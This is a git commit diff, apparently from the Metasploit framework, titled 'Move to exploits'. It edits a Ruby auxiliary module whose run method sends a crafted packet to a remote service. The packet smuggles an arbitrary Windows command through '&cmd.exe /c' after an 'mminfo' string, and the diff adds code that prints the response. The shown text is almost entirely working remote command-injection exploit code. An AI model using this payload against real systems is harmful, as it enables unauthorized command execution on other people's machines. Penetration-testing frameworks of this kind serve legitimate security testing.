Move to exploits
parent
892f72e4ce
commit
d4a8b7e00d
|
@ -37,7 +37,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
def run
|
||||
connect
|
||||
|
||||
padding = Rex::Text.rand_text_alpha_upper(512)
|
||||
|
||||
packet = "\x75~ mminfo &cmd.exe /c #{datastore['CMD']} #{padding}"
|
||||
|
@ -46,6 +45,11 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
sock.put(packet)
|
||||
|
||||
res = sock.get_once
|
||||
if res
|
||||
print_status("#{Rex::Text.to_hex_dump(res)}")
|
||||
end
|
||||
|
||||
disconnect
|
||||
end
|
||||
|
Loading…
Reference in New Issue